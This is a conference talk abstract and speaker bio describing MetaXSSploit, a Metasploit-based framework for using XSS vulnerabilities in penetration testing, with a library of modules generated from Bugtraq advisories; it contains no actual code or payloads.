Presentation Title MetaXSSploit: Bringing XSS to Pentesting
Let’s face it: XSS are now the most common vulnerability we identify. More or less every software has it, and they also make for a nice filler into any pentest report. However, penetration testers and auditors seldomly manage to actually use an XSS and most reports just show the sad Alert popup window as an XSS proof of concept.
With MetaXSSploit we try to do more, proposing a new pluggable Metasploit-based architecture which will act as an integration point for some of your favourite tools, bringing web application pentesting – with a focous on the poor XSS vulnerabilities – to the industrial exploitation state. MetaXSSploit can be used by pentesters and auditors as a mean to streamline the usage and improve the effictiveness of XSS vulns, also leveraging a large library of already discovered XSS vulns in stock applications, with attack modules closely resembling those of Metasploit.
In this talk, we present the creation of MetaXSSploit, from the idea to the automatic generation of the inital 1000 exploits large library from Bugtraq, from the coding of the first payload to the integration with other web application testing tools. It will be a travel in how the tool has been imagined, coded, tested, submitted to conferences and released. We will also present the webapp we developed to automatically create MetaXSSploit modules and advisories starting from the attack vector, our shoot against the XSS-spam we see in security mailing lists.
About Claudio Criscione
Claudio Criscione is a security test engineer at Google. Before joining the company in 2011, Claudio was a penetration tester for most of his career, assessing the security of large infrastructures as well as holding roles in webapp security and virtualization security. He has authored a number of tools, including attack tools, and prides himself of being vaporware-free whenever possible. He has a master’s degree in Computer Engineering from the Politecnico di Milano, where he graduate magna cum laude.